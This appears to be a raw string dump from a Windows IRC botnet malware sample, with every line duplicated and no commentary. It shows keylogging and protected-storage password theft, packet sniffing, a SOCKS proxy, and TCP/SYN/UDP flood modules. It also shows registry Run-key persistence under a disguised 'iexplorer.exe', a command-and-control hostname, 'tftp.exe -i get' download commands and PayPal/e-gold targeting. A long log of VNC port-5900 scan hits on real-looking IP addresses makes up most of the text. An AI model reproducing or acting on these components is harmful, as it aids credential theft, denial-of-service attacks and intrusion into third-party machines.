Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
gdi32.dll
gdi32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
advapi32.dll
advapi32.dll
GetKeyState
GetKeyState
GetAsyncKeyState
GetAsyncKeyState
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
kernel32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s.bck
%s.bck
sfc_os.dll
sfc_os.dll
TCPIP.SYS fixed, version %d.
TCPIP.SYS fixed, version %d.
%s\drivers\tcpip.sys
%s\drivers\tcpip.sys
Patching tcpip.sys.
Patching tcpip.sys.
[PING]: Finished sending pings to %s.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
[UDP]: Error sending pings to %s.
https:/
https:/
http:/
http:/
[pStore] %s %s:%s
[pStore] %s %s:%s
pstorec.dll
pstorec.dll
|%.2d|%s|
|%.2d|%s|
[%d]%s
[%d]%s
[%s|%s|%s|%s]-
[%s|%s|%s|%s]-
Ý %dh %dm
Ý %dh %dm
[PSNIFF]: Error: recv() failed, returned: <%d>
[PSNIFF]: Error: recv() failed, returned: <%d>
[PSNIFF]: Suspicious %s packet from: %s:%d - %s.
[PSNIFF]: Suspicious %s packet from: %s:%d - %s.
[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.
[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.
[PSNIFF]: Error: bind() failed, returned: <%d>.
[PSNIFF]: Error: bind() failed, returned: <%d>.
[PSNIFF]: Error: socket() failed, returned: <%d>.
[PSNIFF]: Error: socket() failed, returned: <%d>.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SYN]: Send error: <%d>.
[SYN]: Send error: <%d>.
%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s
%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s
%s (%s)
%s (%s)
%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.
%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TCP]: Invalid target IP.
[TCP]: Invalid target IP.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Error: socket() failed, returned: <%d>.
[TCP]: Error: socket() failed, returned: <%d>.
:POST / HTTP/1.0
:POST / HTTP/1.0
Content-Length: %d
Content-Length: %d
: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]
: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]
www.google.co.jp
www.google.co.jp
yahoo.co.jp
yahoo.co.jp
www.nifty.com
www.nifty.com
www.d1asia.com
www.d1asia.com
www.st.lib.keio.ac.jp
www.st.lib.keio.ac.jp
www.lib.nthu.edu.tw
www.lib.nthu.edu.tw
www.google.com
www.google.com
www.easynews.com
www.easynews.com
www.above.net
www.above.net
www.level3.com
www.level3.com
nitro.ucsc.edu
nitro.ucsc.edu
www.burst.net
www.burst.net
www.cogentco.com
www.cogentco.com
www.rit.edu
www.rit.edu
www.nocster.com
www.nocster.com
www.verio.com
www.verio.com
www.stanford.edu
www.stanford.edu
www.xo.net
www.xo.net
www.google.it
www.google.it
de.yahoo.com
de.yahoo.com
www.belwue.de
www.belwue.de
www.switch.ch
www.switch.ch
www.1und1.de
www.1und1.de
verio.fr
verio.fr
www.utwente.nl
www.utwente.nl
www.schlund.net
www.schlund.net
%s No %s thread found.
%s No %s thread found.
%s %s %s stopped. (%d thread(s) stopped.)
%s %s %s stopped. (%d thread(s) stopped.)
mscoree.dll
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
Please contact the application's support team for more information.
internal state. The program cannot safely continue execution and must
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
continue execution and must now be terminated.
GetProcessWindowStation
GetProcessWindowStation
PeekNamedPipe
PeekNamedPipe
CreatePipe
CreatePipe
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
GetCPInfo
GetCPInfo
Gt8%S
Gt8%S
iexplorer.exe
iexplorer.exe
sysconfig.dat
sysconfig.dat
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
frozynv.ODIN2-VALHALL.COM
frozynv.ODIN2-VALHALL.COM
ntpass
ntpass
NTPass
NTPass
sql-1433
sql-1433
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
tftp.exe -i get
tftp.exe -i get
:.login
:.login
:!login
:!login
:.ident
:.ident
:.hashin
:.hashin
:.secure
:.secure
:.auth
:.auth
login
login
.download
.download
.update
.update
getcftp
getcftp
JOIN #
JOIN #
NICK
NICK
now an IRC Operator
now an IRC Operator
paypal.com
paypal.com
PAYPAL.COM
PAYPAL.COM
e-gold.com
e-gold.com
e-gold.co.uk
e-gold.co.uk
zcÁ
zcÁ
.9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, Request: iexplorer.exe.
.9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, Request: iexplorer.exe.
[FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
[FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
IP: 174.232.132.21:5900, Scan thread: 1, Sub-thread: 1.
IP: 174.232.132.21:5900, Scan thread: 1, Sub-thread: 1.
IP: 174.192.67.197:5900, Scan thread: 1, Sub-thread: 2.
IP: 174.192.67.197:5900, Scan thread: 1, Sub-thread: 2.
IP: 174.17.113.165:5900, Scan thread: 1, Sub-thread: 3.
IP: 174.17.113.165:5900, Scan thread: 1, Sub-thread: 3.
IP: 174.47.218.244:5900, Scan thread: 1, Sub-thread: 4.
IP: 174.47.218.244:5900, Scan thread: 1, Sub-thread: 4.
IP: 174.183.168.229:5900, Scan thread: 1, Sub-thread: 5.
IP: 174.183.168.229:5900, Scan thread: 1, Sub-thread: 5.
IP: 174.129.103.49:5900, Scan thread: 1, Sub-thread: 6.
IP: 174.129.103.49:5900, Scan thread: 1, Sub-thread: 6.
IP: 174.10.3.9:5900, Scan thread: 1, Sub-thread: 7.
IP: 174.10.3.9:5900, Scan thread: 1, Sub-thread: 7.
IP: 174.142.86.244:5900, Scan thread: 1, Sub-thread: 8.
IP: 174.142.86.244:5900, Scan thread: 1, Sub-thread: 8.
IP: 174.155.59.118:5900, Scan thread: 1, Sub-thread: 9.
IP: 174.155.59.118:5900, Scan thread: 1, Sub-thread: 9.
IP: 174.218.161.46:5900, Scan thread: 1, Sub-thread: 10.
IP: 174.218.161.46:5900, Scan thread: 1, Sub-thread: 10.
IP: 174.186.16.248:5900, Scan thread: 1, Sub-thread: 11.
IP: 174.186.16.248:5900, Scan thread: 1, Sub-thread: 11.
IP: 174.2.190.18:5900, Scan thread: 1, Sub-thread: 12.
IP: 174.2.190.18:5900, Scan thread: 1, Sub-thread: 12.
IP: 174.176.117.60:5900, Scan thread: 1, Sub-thread: 13.
IP: 174.176.117.60:5900, Scan thread: 1, Sub-thread: 13.
IP: 174.235.21.94:5900, Scan thread: 1, Sub-thread: 14.
IP: 174.235.21.94:5900, Scan thread: 1, Sub-thread: 14.
IP: 174.160.19.143:5900, Scan thread: 1, Sub-thread: 15.
IP: 174.160.19.143:5900, Scan thread: 1, Sub-thread: 15.
IP: 174.123.64.19:5900, Scan thread: 1, Sub-thread: 16.
IP: 174.123.64.19:5900, Scan thread: 1, Sub-thread: 16.
IP: 174.232.103.144:5900, Scan thread: 1, Sub-thread: 17.
IP: 174.232.103.144:5900, Scan thread: 1, Sub-thread: 17.
IP: 174.120.81.194:5900, Scan thread: 1, Sub-thread: 18.
IP: 174.120.81.194:5900, Scan thread: 1, Sub-thread: 18.
IP: 174.230.145.11:5900, Scan thread: 1, Sub-thread: 19.
IP: 174.230.145.11:5900, Scan thread: 1, Sub-thread: 19.
IP: 174.185.47.196:5900, Scan thread: 1, Sub-thread: 20.
IP: 174.185.47.196:5900, Scan thread: 1, Sub-thread: 20.
IP: 174.26.195.76:5900, Scan thread: 1, Sub-thread: 21.
IP: 174.26.195.76:5900, Scan thread: 1, Sub-thread: 21.
IP: 174.113.201.228:5900, Scan thread: 1, Sub-thread: 22.
IP: 174.113.201.228:5900, Scan thread: 1, Sub-thread: 22.
IP: 174.161.240.130:5900, Scan thread: 1, Sub-thread: 23.
IP: 174.161.240.130:5900, Scan thread: 1, Sub-thread: 23.
IP: 174.68.162.196:5900, Scan thread: 1, Sub-thread: 24.
IP: 174.68.162.196:5900, Scan thread: 1, Sub-thread: 24.
IP: 174.240.21.27:5900, Scan thread: 1, Sub-thread: 25.
IP: 174.240.21.27:5900, Scan thread: 1, Sub-thread: 25.
IP: 174.78.240.230:5900, Scan thread: 1, Sub-thread: 26.
IP: 174.78.240.230:5900, Scan thread: 1, Sub-thread: 26.
IP: 174.221.51.84:5900, Scan thread: 1, Sub-thread: 27.
IP: 174.221.51.84:5900, Scan thread: 1, Sub-thread: 27.
IP: 174.172.49.199:5900, Scan thread: 1, Sub-thread: 28.
IP: 174.172.49.199:5900, Scan thread: 1, Sub-thread: 28.
IP: 174.80.79.203:5900, Scan thread: 1, Sub-thread: 29.
IP: 174.80.79.203:5900, Scan thread: 1, Sub-thread: 29.
IP: 174.41.2.54:5900, Scan thread: 1, Sub-thread: 30.
IP: 174.41.2.54:5900, Scan thread: 1, Sub-thread: 30.
IP: 174.56.21.84:5900, Scan thread: 1, Sub-thread: 31.
IP: 174.56.21.84:5900, Scan thread: 1, Sub-thread: 31.
IP: 174.20.215.201:5900, Scan thread: 1, Sub-thread: 32.
IP: 174.20.215.201:5900, Scan thread: 1, Sub-thread: 32.
IP: 174.151.152.169:5900, Scan thread: 1, Sub-thread: 33.
IP: 174.151.152.169:5900, Scan thread: 1, Sub-thread: 33.
IP: 174.190.244.114:5900, Scan thread: 1, Sub-thread: 34.
IP: 174.190.244.114:5900, Scan thread: 1, Sub-thread: 34.
IP: 174.113.51.166:5900, Scan thread: 1, Sub-thread: 35.
IP: 174.113.51.166:5900, Scan thread: 1, Sub-thread: 35.
IP: 174.207.104.3:5900, Scan thread: 1, Sub-thread: 36.
IP: 174.207.104.3:5900, Scan thread: 1, Sub-thread: 36.
IP: 174.22.77.143:5900, Scan thread: 1, Sub-thread: 37.
IP: 174.22.77.143:5900, Scan thread: 1, Sub-thread: 37.
IP: 174.255.156.151:5900, Scan thread: 1, Sub-thread: 38.
IP: 174.255.156.151:5900, Scan thread: 1, Sub-thread: 38.
IP: 174.6.52.9:5900, Scan thread: 1, Sub-thread: 39.
IP: 174.6.52.9:5900, Scan thread: 1, Sub-thread: 39.
IP: 174.91.208.247:5900, Scan thread: 1, Sub-thread: 40.
IP: 174.91.208.247:5900, Scan thread: 1, Sub-thread: 40.
IP: 174.209.73.225:5900, Scan thread: 1, Sub-thread: 41.
IP: 174.209.73.225:5900, Scan thread: 1, Sub-thread: 41.
IP: 174.88.29.10:5900, Scan thread: 1, Sub-thread: 42.
IP: 174.88.29.10:5900, Scan thread: 1, Sub-thread: 42.
IP: 174.203.109.146:5900, Scan thread: 1, Sub-thread: 43.
IP: 174.203.109.146:5900, Scan thread: 1, Sub-thread: 43.
IP: 174.141.108.194:5900, Scan thread: 1, Sub-thread: 44.
IP: 174.141.108.194:5900, Scan thread: 1, Sub-thread: 44.
IP: 174.245.230.10:5900, Scan thread: 1, Sub-thread: 45.
IP: 174.245.230.10:5900, Scan thread: 1, Sub-thread: 45.
IP: 174.118.146.145:5900, Scan thread: 1, Sub-thread: 46.
IP: 174.118.146.145:5900, Scan thread: 1, Sub-thread: 46.
IP: 174.81.255.188:5900, Scan thread: 1, Sub-thread: 47.
IP: 174.81.255.188:5900, Scan thread: 1, Sub-thread: 47.
IP: 174.56.85.253:5900, Scan thread: 1, Sub-thread: 48.
IP: 174.56.85.253:5900, Scan thread: 1, Sub-thread: 48.
IP: 174.155.132.119:5900, Scan thread: 1, Sub-thread: 49.
IP: 174.155.132.119:5900, Scan thread: 1, Sub-thread: 49.
IP: 174.14.69.176:5900, Scan thread: 1, Sub-thread: 50.
IP: 174.14.69.176:5900, Scan thread: 1, Sub-thread: 50.
IP: 174.177.121.98:5900, Scan thread: 1, Sub-thread: 51.
IP: 174.177.121.98:5900, Scan thread: 1, Sub-thread: 51.
IP: 174.153.155.251:5900, Scan thread: 1, Sub-thread: 52.
IP: 174.153.155.251:5900, Scan thread: 1, Sub-thread: 52.
IP: 174.115.229.98:5900, Scan thread: 1, Sub-thread: 53.
IP: 174.115.229.98:5900, Scan thread: 1, Sub-thread: 53.
IP: 174.60.150.120:5900, Scan thread: 1, Sub-thread: 54.
IP: 174.60.150.120:5900, Scan thread: 1, Sub-thread: 54.
IP: 174.1.252.92:5900, Scan thread: 1, Sub-thread: 55.
IP: 174.1.252.92:5900, Scan thread: 1, Sub-thread: 55.
IP: 174.125.33.167:5900, Scan thread: 1, Sub-thread: 56.
IP: 174.125.33.167:5900, Scan thread: 1, Sub-thread: 56.
IP: 174.131.213.143:5900, Scan thread: 1, Sub-thread: 57.
IP: 174.131.213.143:5900, Scan thread: 1, Sub-thread: 57.
IP: 174.177.182.162:5900, Scan thread: 1, Sub-thread: 58.
IP: 174.177.182.162:5900, Scan thread: 1, Sub-thread: 58.
IP: 174.234.58.135:5900, Scan thread: 1, Sub-thread: 59.
IP: 174.234.58.135:5900, Scan thread: 1, Sub-thread: 59.
IP: 174.119.118.141:5900, Scan thread: 1, Sub-thread: 60.
IP: 174.119.118.141:5900, Scan thread: 1, Sub-thread: 60.
IP: 174.121.252.116:5900, Scan thread: 1, Sub-thread: 61.
IP: 174.121.252.116:5900, Scan thread: 1, Sub-thread: 61.
IP: 174.33.193.116:5900, Scan thread: 1, Sub-thread: 62.
IP: 174.33.193.116:5900, Scan thread: 1, Sub-thread: 62.
IP: 174.171.4.233:5900, Scan thread: 1, Sub-thread: 63.
IP: 174.171.4.233:5900, Scan thread: 1, Sub-thread: 63.
IP: 174.193.253.142:5900, Scan thread: 1, Sub-thread: 64.
IP: 174.193.253.142:5900, Scan thread: 1, Sub-thread: 64.
IP: 174.220.36.228:5900, Scan thread: 1, Sub-thread: 65.
IP: 174.220.36.228:5900, Scan thread: 1, Sub-thread: 65.
IP: 174.243.166.196:5900, Scan thread: 1, Sub-thread: 66.
IP: 174.243.166.196:5900, Scan thread: 1, Sub-thread: 66.
IP: 174.142.254.193:5900, Scan thread: 1, Sub-thread: 67.
IP: 174.142.254.193:5900, Scan thread: 1, Sub-thread: 67.
IP: 174.177.245.125:5900, Scan thread: 1, Sub-thread: 68.
IP: 174.177.245.125:5900, Scan thread: 1, Sub-thread: 68.
IP: 174.2.176.240:5900, Scan thread: 1, Sub-thread: 69.
IP: 174.2.176.240:5900, Scan thread: 1, Sub-thread: 69.
IP: 174.236.13.135:5900, Scan thread: 1, Sub-thread: 70.
IP: 174.236.13.135:5900, Scan thread: 1, Sub-thread: 70.
IP: 174.249.151.8:5900, Scan thread: 1, Sub-thread: 71.
IP: 174.249.151.8:5900, Scan thread: 1, Sub-thread: 71.
IP: 174.179.207.158:5900, Scan thread: 1, Sub-thread: 72.
IP: 174.179.207.158:5900, Scan thread: 1, Sub-thread: 72.
IP: 174.155.244.207:5900, Scan thread: 1, Sub-thread: 73.
IP: 174.155.244.207:5900, Scan thread: 1, Sub-thread: 73.
IP: 174.222.117.213:5900, Scan thread: 1, Sub-thread: 74.
IP: 174.222.117.213:5900, Scan thread: 1, Sub-thread: 74.
IP: 174.138.75.65:5900, Scan thread: 1, Sub-thread: 75.
IP: 174.138.75.65:5900, Scan thread: 1, Sub-thread: 75.
IP: 174.214.79.105:5900, Scan thread: 1, Sub-thread: 76.
IP: 174.214.79.105:5900, Scan thread: 1, Sub-thread: 76.
IP: 174.240.14.140:5900, Scan thread: 1, Sub-thread: 77.
IP: 174.240.14.140:5900, Scan thread: 1, Sub-thread: 77.
IP: 174.192.215.37:5900, Scan thread: 1, Sub-thread: 78.
IP: 174.192.215.37:5900, Scan thread: 1, Sub-thread: 78.
IP: 174.67.53.231:5900, Scan thread: 1, Sub-thread: 79.
IP: 174.67.53.231:5900, Scan thread: 1, Sub-thread: 79.
IP: 174.202.144.236:5900, Scan thread: 1, Sub-thread: 80.
IP: 174.202.144.236:5900, Scan thread: 1, Sub-thread: 80.
IP: 174.129.120.214:5900, Scan thread: 1, Sub-thread: 81.
IP: 174.129.120.214:5900, Scan thread: 1, Sub-thread: 81.
IP: 174.2.247.219:5900, Scan thread: 1, Sub-thread: 82.
IP: 174.2.247.219:5900, Scan thread: 1, Sub-thread: 82.
IP: 174.100.22.211:5900, Scan thread: 1, Sub-thread: 83.
IP: 174.100.22.211:5900, Scan thread: 1, Sub-thread: 83.
IP: 174.179.61.214:5900, Scan thread: 1, Sub-thread: 84.
IP: 174.179.61.214:5900, Scan thread: 1, Sub-thread: 84.
IP: 174.32.39.235:5900, Scan thread: 1, Sub-thread: 85.
IP: 174.32.39.235:5900, Scan thread: 1, Sub-thread: 85.
IP: 174.209.176.168:5900, Scan thread: 1, Sub-thread: 86.
IP: 174.209.176.168:5900, Scan thread: 1, Sub-thread: 86.
IP: 174.133.17.234:5900, Scan thread: 1, Sub-thread: 87.
IP: 174.133.17.234:5900, Scan thread: 1, Sub-thread: 87.
IP: 174.43.74.109:5900, Scan thread: 1, Sub-thread: 88.
IP: 174.43.74.109:5900, Scan thread: 1, Sub-thread: 88.
IP: 174.87.65.63:5900, Scan thread: 1, Sub-thread: 89.
IP: 174.87.65.63:5900, Scan thread: 1, Sub-thread: 89.
IP: 174.152.34.126:5900, Scan thread: 1, Sub-thread: 90.
IP: 174.152.34.126:5900, Scan thread: 1, Sub-thread: 90.
IP: 174.246.18.227:5900, Scan thread: 1, Sub-thread: 91.
IP: 174.246.18.227:5900, Scan thread: 1, Sub-thread: 91.
IP: 174.152.5.160:5900, Scan thread: 1, Sub-thread: 92.
IP: 174.152.5.160:5900, Scan thread: 1, Sub-thread: 92.
IP: 174.178.255.210:5900, Scan thread: 1, Sub-thread: 93.
IP: 174.178.255.210:5900, Scan thread: 1, Sub-thread: 93.
IP: 174.39.243.213:5900, Scan thread: 1, Sub-thread: 94.
IP: 174.39.243.213:5900, Scan thread: 1, Sub-thread: 94.
IP: 174.91.234.229:5900, Scan thread: 1, Sub-thread: 95.
IP: 174.91.234.229:5900, Scan thread: 1, Sub-thread: 95.
IP: 174.175.120.3:5900, Scan thread: 1, Sub-thread: 96.
IP: 174.175.120.3:5900, Scan thread: 1, Sub-thread: 96.
IP: 174.130.249.102:5900, Scan thread: 1, Sub-thread: 97.
IP: 174.130.249.102:5900, Scan thread: 1, Sub-thread: 97.
IP: 174.241.233.228:5900, Scan thread: 1, Sub-thread: 98.
IP: 174.241.233.228:5900, Scan thread: 1, Sub-thread: 98.
IP: 174.94.249.242:5900, Scan thread: 1, Sub-thread: 99.
IP: 174.94.249.242:5900, Scan thread: 1, Sub-thread: 99.
IP: 174.140.245.149:5900, Scan thread: 1, Sub-thread: 100.
IP: 174.140.245.149:5900, Scan thread: 1, Sub-thread: 100.
IP: 174.72.123.213:5900, Scan thread: 1, Sub-thread: 101.
IP: 174.72.123.213:5900, Scan thread: 1, Sub-thread: 101.
IP: 174.30.33.213:5900, Scan thread: 1, Sub-thread: 102.
IP: 174.30.33.213:5900, Scan thread: 1, Sub-thread: 102.
IP: 174.135.26.105:5900, Scan thread: 1, Sub-thread: 103.
IP: 174.135.26.105:5900, Scan thread: 1, Sub-thread: 103.
IP: 174.100.237.108:5900, Scan thread: 1, Sub-thread: 104.
IP: 174.100.237.108:5900, Scan thread: 1, Sub-thread: 104.
IP: 174.103.182.177:5900, Scan thread: 1, Sub-thread: 105.
IP: 174.103.182.177:5900, Scan thread: 1, Sub-thread: 105.
IP: 174.108.75.215:5900, Scan thread: 1, Sub-thread: 106.
IP: 174.108.75.215:5900, Scan thread: 1, Sub-thread: 106.
IP: 174.42.149.25:5900, Scan thread: 1, Sub-thread: 107.
IP: 174.42.149.25:5900, Scan thread: 1, Sub-thread: 107.
IP: 174.124.0.165:5900, Scan thread: 1, Sub-thread: 108.
IP: 174.124.0.165:5900, Scan thread: 1, Sub-thread: 108.
IP: 174.214.40.212:5900, Scan thread: 1, Sub-thread: 109.
IP: 174.214.40.212:5900, Scan thread: 1, Sub-thread: 109.
IP: 174.230.5.182:5900, Scan thread: 1, Sub-thread: 110.
IP: 174.230.5.182:5900, Scan thread: 1, Sub-thread: 110.
IP: 174.111.55.103:5900, Scan thread: 1, Sub-thread: 111.
IP: 174.111.55.103:5900, Scan thread: 1, Sub-thread: 111.
IP: 174.11.251.175:5900, Scan thread: 1, Sub-thread: 112.
IP: 174.11.251.175:5900, Scan thread: 1, Sub-thread: 112.
IP: 174.211.198.6:5900, Scan thread: 1, Sub-thread: 113.
IP: 174.211.198.6:5900, Scan thread: 1, Sub-thread: 113.
IP: 174.107.203.121:5900, Scan thread: 1, Sub-thread: 114.
IP: 174.107.203.121:5900, Scan thread: 1, Sub-thread: 114.
IP: 174.119.119.136:5900, Scan thread: 1, Sub-thread: 115.
IP: 174.119.119.136:5900, Scan thread: 1, Sub-thread: 115.
IP: 174.93.94.90:5900, Scan thread: 1, Sub-thread: 116.
IP: 174.93.94.90:5900, Scan thread: 1, Sub-thread: 116.
IP: 174.125.242.8:5900, Scan thread: 1, Sub-thread: 117.
IP: 174.125.242.8:5900, Scan thread: 1, Sub-thread: 117.
IP: 174.158.62.34:5900, Scan thread: 1, Sub-thread: 118.
IP: 174.158.62.34:5900, Scan thread: 1, Sub-thread: 118.
IP: 174.153.239.170:5900, Scan thread: 1, Sub-thread: 119.
IP: 174.153.239.170:5900, Scan thread: 1, Sub-thread: 119.
IP: 174.5.186.1:5900, Scan thread: 1, Sub-thread: 120.
IP: 174.5.186.1:5900, Scan thread: 1, Sub-thread: 120.
IP: 174.212.220.116:5900, Scan thread: 1, Sub-thread: 121.
IP: 174.212.220.116:5900, Scan thread: 1, Sub-thread: 121.
IP: 174.213.166.101:5900, Scan thread: 1, Sub-thread: 122.
IP: 174.213.166.101:5900, Scan thread: 1, Sub-thread: 122.
IP: 174.26.237.47:5900, Scan thread: 1, Sub-thread: 123.
IP: 174.26.237.47:5900, Scan thread: 1, Sub-thread: 123.
IP: 174.12.231.242:5900, Scan thread: 1, Sub-thread: 124.
IP: 174.12.231.242:5900, Scan thread: 1, Sub-thread: 124.
IP: 174.179.119.98:5900, Scan thread: 1, Sub-thread: 125.
IP: 174.179.119.98:5900, Scan thread: 1, Sub-thread: 125.
IP: 174.211.225.95:5900, Scan thread: 1, Sub-thread: 126.
IP: 174.211.225.95:5900, Scan thread: 1, Sub-thread: 126.
IP: 174.64.217.110:5900, Scan thread: 1, Sub-thread: 127.
IP: 174.64.217.110:5900, Scan thread: 1, Sub-thread: 127.
IP: 174.184.103.41:5900, Scan thread: 1, Sub-thread: 128.
IP: 174.184.103.41:5900, Scan thread: 1, Sub-thread: 128.
IP: 174.13.172.64:5900, Scan thread: 1, Sub-thread: 129.
IP: 174.13.172.64:5900, Scan thread: 1, Sub-thread: 129.
IP: 174.203.22.69:5900, Scan thread: 1, Sub-thread: 130.
IP: 174.203.22.69:5900, Scan thread: 1, Sub-thread: 130.
IP: 174.19.232.180:5900, Scan thread: 1, Sub-thread: 131.
IP: 174.19.232.180:5900, Scan thread: 1, Sub-thread: 131.
IP: 174.28.239.184:5900, Scan thread: 1, Sub-thread: 132.
IP: 174.28.239.184:5900, Scan thread: 1, Sub-thread: 132.
IP: 174.251.205.71:5900, Scan thread: 1, Sub-thread: 133.
IP: 174.251.205.71:5900, Scan thread: 1, Sub-thread: 133.
IP: 174.107.192.248:5900, Scan thread: 1, Sub-thread: 134.
IP: 174.107.192.248:5900, Scan thread: 1, Sub-thread: 134.
IP: 174.169.41.73:5900, Scan thread: 1, Sub-thread: 135.
IP: 174.169.41.73:5900, Scan thread: 1, Sub-thread: 135.
IP: 174.69.231.137:5900, Scan thread: 1, Sub-thread: 136.
IP: 174.69.231.137:5900, Scan thread: 1, Sub-thread: 136.
IP: 174.165.66.183:5900, Scan thread: 1, Sub-thread: 137.
IP: 174.165.66.183:5900, Scan thread: 1, Sub-thread: 137.
IP: 174.229.164.119:5900, Scan thread: 1, Sub-thread: 138.
IP: 174.229.164.119:5900, Scan thread: 1, Sub-thread: 138.
IP: 174.229.24.200:5900, Scan thread: 1, Sub-thread: 139.
IP: 174.229.24.200:5900, Scan thread: 1, Sub-thread: 139.
IP: 174.20.15.247:5900, Scan thread: 1, Sub-thread: 140.
IP: 174.20.15.247:5900, Scan thread: 1, Sub-thread: 140.
IP: 174.224.224.66:5900, Scan thread: 1, Sub-thread: 141.
IP: 174.224.224.66:5900, Scan thread: 1, Sub-thread: 141.
IP: 174.255.99.198:5900, Scan thread: 1, Sub-thread: 142.
IP: 174.255.99.198:5900, Scan thread: 1, Sub-thread: 142.
IP: 174.205.41.48:5900, Scan thread: 1, Sub-thread: 143.
IP: 174.205.41.48:5900, Scan thread: 1, Sub-thread: 143.
IP: 174.209.74.121:5900, Scan thread: 1, Sub-thread: 144.
IP: 174.209.74.121:5900, Scan thread: 1, Sub-thread: 144.
IP: 174.199.246.213:5900, Scan thread: 1, Sub-thread: 145.
IP: 174.199.246.213:5900, Scan thread: 1, Sub-thread: 145.
IP: 174.98.59.128:5900, Scan thread: 1, Sub-thread: 146.
IP: 174.98.59.128:5900, Scan thread: 1, Sub-thread: 146.
IP: 174.34.238.62:5900, Scan thread: 1, Sub-thread: 147.
IP: 174.34.238.62:5900, Scan thread: 1, Sub-thread: 147.
IP: 174.240.58.51:5900, Scan thread: 1, Sub-thread: 148.
IP: 174.240.58.51:5900, Scan thread: 1, Sub-thread: 148.
IP: 174.99.20.131:5900, Scan thread: 1, Sub-thread: 149.
IP: 174.99.20.131:5900, Scan thread: 1, Sub-thread: 149.
IP: 174.34.130.179:5900, Scan thread: 1, Sub-thread: 150.
IP: 174.34.130.179:5900, Scan thread: 1, Sub-thread: 150.
IP: 174.178.211.78:5900, Scan thread: 1, Sub-thread: 151.
IP: 174.178.211.78:5900, Scan thread: 1, Sub-thread: 151.
IP: 174.199.155.221:5900, Scan thread: 1, Sub-thread: 152.
IP: 174.199.155.221:5900, Scan thread: 1, Sub-thread: 152.
IP: 174.13.60.103:5900, Scan thread: 1, Sub-thread: 153.
IP: 174.13.60.103:5900, Scan thread: 1, Sub-thread: 153.
IP: 174.80.227.174:5900, Scan thread: 1, Sub-thread: 154.
IP: 174.80.227.174:5900, Scan thread: 1, Sub-thread: 154.
